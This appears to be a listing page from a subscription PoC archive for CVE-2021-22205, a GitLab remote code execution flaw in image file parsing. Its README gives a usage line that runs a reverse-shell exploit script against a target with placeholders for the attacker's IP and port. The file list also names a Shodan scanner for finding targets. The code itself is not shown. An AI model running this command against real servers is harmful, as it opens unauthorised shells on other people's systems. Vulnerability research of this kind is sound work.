Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-22205 PoC — GitLab 代码注入漏洞

Source
Associated Vulnerability
Title:GitLab 代码注入漏洞 (CVE-2021-22205)
Description:An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
Readme
# GitLab-CVE-2021-22205-scanner

## Usage

    $~ python3 GitLab-revshell.py -u https://gitlab.target.com -l [AttackerIP] -p [AttackerPort]

## Credit
- https://hackerone.com/reports/1154542
- Referred code snippet from here: https://github.com/CsEnox/Gitlab-Exiftool-RCE/blob/main/exploit.py


## Disclaimer:

    The script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities
File Snapshot

[4.0K] /data/pocs/16e62ed04d62d6b2285d0406515300fd748a29d8 ├── [3.6K] GitLab-revshell.py ├── [ 440] README.md └── [3.9K] shodan-scanner.py 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →